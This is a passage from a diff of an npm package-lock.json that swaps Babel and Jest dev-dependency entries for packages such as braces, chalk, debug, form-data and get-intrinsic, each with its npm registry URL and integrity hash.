"sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "fill-range": "^7.1.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">= 0.4" } }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" }, "engines": { - "node": ">=6.9.0" + "node": ">=10" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" } }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.19.0" + "color-name": "~1.1.4" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">=7.0.0" } }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true + }, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" + "delayed-stream": "~1.0.0" }, "engines": { - "node": ">=6.9.0" + "node": ">= 0.8" } }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, + "node_modules/commander": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", + "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==", "engines": { - "node": ">=6.9.0" + "node": ">= 6" } }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" + "ms": "^2.1.3" }, "engines": { - "node": ">=6.9.0" + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", "engines": { - "node": ">=8" + "node": ">=0.4.0" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "license": "MIT", "dependencies": { - "sprintf-js": "~1.0.2" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", "dev": true, + "license": "MIT", "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" + "once": "^1.4.0" } }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "license": "MIT", "engines": { - "node": ">=8" + "node": ">= 0.4" } }, - "node_modules/@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", - "dev": true, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "license": "MIT", "dependencies": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" + "es-errors": "^1.3.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } + "node": ">= 0.4" } }, - "node_modules/@jest/core/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "license": "MIT", "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/core/node_modules/convert-source-map": { + "node_modules/escape-string-regexp": { "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/@jest/core/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" + "node": ">=8" } }, - "node_modules/@jest/core/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "license": "MIT" }, - "node_modules/@jest/core/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" + "to-regex-range": "^5.0.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/core/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, + "node_modules/follow-redirects": { + "version": "1.15.6", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", + "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", + "funding": [ + { + "type": "individual", + "url": "https://github.com/sponsors/RubenVerborgh" + } + ], "engines": { - "node": ">=10" + "node": ">=4.0" }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" + "peerDependenciesMeta": { + "debug": { + "optional": true + } } }, - "node_modules/@jest/core/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, + "node_modules/form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", + "license": "MIT", "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" }, "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + "node": ">= 6" } }, - "node_modules/@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", - "dev": true, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "license": "MIT", "dependencies": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", - "dev": true, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "license": "MIT", "dependencies": { - "jest-get-type": "^29.2.0" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/expect-utils/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "license": "ISC" }, - "node_modules/@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" + "node": ">= 0.4" }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/reporters/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - 